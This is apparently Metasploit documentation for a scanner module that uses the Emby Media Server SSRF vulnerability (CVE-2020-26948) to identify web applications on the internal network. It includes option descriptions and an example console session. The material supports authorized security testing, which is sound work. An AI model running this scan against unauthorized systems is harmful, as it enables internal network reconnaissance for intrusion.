documentation/modules/auxiliary/scanner/http/emby_ssrf_scanner.md
This module has been tested on Emby Media Server versions older than 4.5.
Generates a GET request to the provided web servers and executes an SSRF against the targeted EMBY server.
Returns the server header, HTML title, and location header. This is useful for rapidly identifying web applications
on the internal network using the Emby SSRF vulnerability (CVE-2020-26948).
use auxiliary/scanner/http/emby_ssrf_scannerset rhosts [ips]set emby_server [emby_server_ip]runSelect which ports to check for HTTP servers internal to the Emby server. Defaults to 80,8080,8081,8888.
IP address of the Emby server to use. Required.
Emby server access port. Defaults to 8096.
If set to false, will not show the titles on the console as they are grabbed. Defaults to true.
If set to false, will not store the captured information in notes. Use notes -t http.title to view. Defaults to true.
msf > use auxiliary/scanner/http/emby_ssrf_scanner
msf auxiliary(scanner/http/emby_ssrf_scanner) > set emby_server 10.10.200.32
emby_server => 10.10.200.32
msf auxiliary(scanner/http/emby_ssrf_scanner) > set rhosts 192.168.2.3
rhosts => 192.168.2.3
msf auxiliary(scanner/http/emby_ssrf_scanner) > run
[+] 192.168.2.3:8096 Title: Emby
[+] 192.168.2.3:8096 HTTP Code: 200
[+] 192.168.2.3:8096 Location Header:
[+] 192.168.2.3:8096 Server Header: UPnP/1.0 DLNADOC/1.50
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed